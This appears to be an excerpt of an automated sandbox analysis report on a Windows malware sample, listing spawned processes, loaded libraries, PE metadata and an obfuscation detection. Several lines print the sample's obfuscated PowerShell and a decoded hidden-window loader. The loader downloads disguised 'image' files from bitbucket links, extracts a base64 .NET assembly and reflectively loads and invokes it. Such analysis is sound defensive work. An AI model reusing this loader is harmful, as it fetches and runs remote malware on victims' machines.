        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.orFAmco/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}"
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeProcess created: C:\Windows\System32\cmd.exe cmd /c gam.batJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#CJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.orFAmco/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}"Jump to behavior
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeSection loaded: feclient.dllJump to behavior
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeSection loaded: advpack.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: 0XVZC3kfwL.exeStatic PE information: Image base 0x140000000 > 0x60000000
        Source: 0XVZC3kfwL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: 0XVZC3kfwL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: 0XVZC3kfwL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: 0XVZC3kfwL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: 0XVZC3kfwL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: 0XVZC3kfwL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: 0XVZC3kfwL.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
        Source: 0XVZC3kfwL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: e.pdb source: powershell.exe, 00000005.00000002.1546060009.000001EEDDFAE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wextract.pdb source: 0XVZC3kfwL.exe
        Source: Binary string: wextract.pdbGCTL source: 0XVZC3kfwL.exe
        Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000005.00000002.1546060009.000001EEDDFAE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.1546060009.000001EEDDFAE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000005.00000002.1545872221.000001EEDDF60000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbP@{ source: powershell.exe, 00000005.00000002.1545597457.000001EEDDF1A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.1546060009.000001EEDDFAE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000005.00000002.1546060009.000001EEDDFFC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdbbert\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSI:Syf source: powershell.exe, 00000005.00000002.1546060009.000001EEDDFFC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.1546060009.000001EEDDFAE000.00000004.00000020.00020000.00000000.sdmp
        Source: 0XVZC3kfwL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: 0XVZC3kfwL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: 0XVZC3kfwL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: 0XVZC3kfwL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: 0XVZC3kfwL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

        Data Obfuscation

        barindex
        Found suspicious powershell code related to unpacking or dynamic code loading
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g